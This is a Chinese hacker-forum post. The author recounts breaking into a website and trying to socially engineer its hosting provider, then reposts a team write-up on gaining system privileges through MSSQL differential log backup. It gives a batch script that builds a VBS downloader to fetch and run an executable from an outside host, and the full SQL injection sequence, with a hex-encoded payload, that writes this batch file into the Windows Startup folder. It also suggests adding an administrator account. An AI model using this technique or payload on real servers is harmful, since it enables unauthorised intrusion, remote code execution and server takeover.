昨天在網上找資料的時間無意進了一個站,糊裡糊塗就進去了,想提權提不起來,後來加上服務商的Q號想社工一下,射了半天得知服務器的安全是綠盟的人給做的 安全,後來就問豬豬有什麼提權的方法沒,他剛好做了這個動畫就給發來過來,在網上查了一下找到了文章,一起拷貝過來.最近忙著學習很少關注這方面的東西, 落後了,落後了......
下面是是在網上找到的資料和動畫.
TEAM裡的內部資料放久了,現在不放出來,遲早會有人發掘出來的!既然如此就拿出來大家分享吧!
MSSQL差異備份獲取webshell 幾乎人人皆知,那麼我們可以利用差異備份出來的文件 當作惡意代碼
讓系統執行了之後自動提升權限 或者添加管理員嗎? 答案當然可以了,kj021320測試了N次之後跟你說!
那麼我們得考慮文件擺放的位置~什麼地方系統會運行呢?這個其實算是廢話吧!
大家不用想都知道 通用地方 C:\Documents and Settings\All Users\「開始」菜單\程序\啟動
呵呵位置有了! 那麼我們備份什麼文件讓系統能執行的呢?
這個是第一個關鍵點~!
EXE JS VBS BAT這些文件大家第一時間想到的了
那些我一個一個來分析 exe的話!絕對能了! 但是 MSSQL差異備份這麼多垃圾肯定會把exe弄壞的!
否決掉
然後到腳本
VBS 我們能不能把 他的垃圾信息注釋掉呢? 不然VBS 會執行不了! OK 學過VBS的朋友都知道
VBS裡面 有2種注釋 ' 還有就是 rem
但是還是會有垃圾信息屏蔽不了
否決掉
JS呢? JS裡面有多行注釋的/**/ 但是 /* 不可能在首行吧?
否決掉
最後 剩下我們最熟悉的bat批處理了!
OK我們繼續分析 bat裡面注釋是什麼呢?也是REM,失敗啊!之前vbs那裡不行 這裡的rem注釋也一樣不行的!
那麼我們怎麼辦呢?其實很簡單! 當我們在CMD下面敲錯了命令系統會怎樣呢?
說到這裡 要是大家不往文章下面看也一樣能想到方法了吧~
OK我們繼續探~~這裡是最最關鍵點,差異備份出來的垃圾信息我們可以通過用回車把他提交了!
而系統只當作無用的命令來處理!不影響我們的操作!
問題就這樣解決了嗎?不是的!~MSSQL備份的時候,到一定的字符長度就會出現垃圾的字符,那個字符會影響我們的操作!
那麼我們得把語句盡量縮少,越少越好~
OK那我們思路好了就采用bat 寫一個VBS的下載者 然後執行這個下載者 最後通過下載者down回來的馬子來獲取系統權限
下面是我改過的生成下載者的BAT
echo Set P=createObject("Microsoft.XMLHTTP")>k.vbs
echo P.Open "GET","http://www.isto.cn/t.exe",0 >>k.vbs
echo P.Send():set G=createObject("ADODB.Stream")>>k.vbs
echo G.Mode=3:G.Type=1:G.Open() >>k.vbs
echo G.Write P.ResponseBody:G.SaveToFile "t.exe",2 >>k.vbs
k.vbs
t
下一個k.VBS然後k.vbs下載一個t.exe文件保存到本地 直接執行
記得記得我說過的代碼前面一定要用回車把垃圾數據提交 最好2以上個回車
然後實現差異備份
alter database ISTO set RECOVERY FULL--
create table cmd (a image)--
backup log ISTO to disk = 'c:\cmd1' with init--
insert into cmd (a) values (0x130A0D0A6563686F2053657420503D6372656174654F626A65637428224D696372
6F736F66742E584D4C4854545022293E6B2E7662730D0A6563686F20502E4F70656E2
022474554222C22687474703A2F2F7777772E6973746F2E636E2F742E657865222C30
203E3E6B2E7662730D0A6563686F20502E53656E6428293A73657420473D63726561
74654F626A656374282241444F44422E53747265616D22293E3E6B2E7662730D0A65
63686F20472E4D6F64653D333A472E547970653D313A472E4F70656E2829203E3E6B
2E76627320200D0A6563686F20472E577269746520502E526573706F6E7365426F64
793A472E53617665546F46696C652022742E657865222C32203E3E6B2E7662730D0A
6B2E7662730D0A740D0A)--
backup log ISTO to disk = 'C:\Documents and Settings\All Users\「開始」菜單\程序\啟動\1.bat'--
drop table cmd--
OK bat出來了! 至於怎樣讓服務器重啟呢!這個問題遺留給你們去討論吧!
要是服務器直接開啟了3389 那就更方便了! 直接bat 一個添加管理員的命令更爽!
isto是動畫裡用到的工具.
isto輔助轉換工具.rar
mssql差異備份取系統權限.rar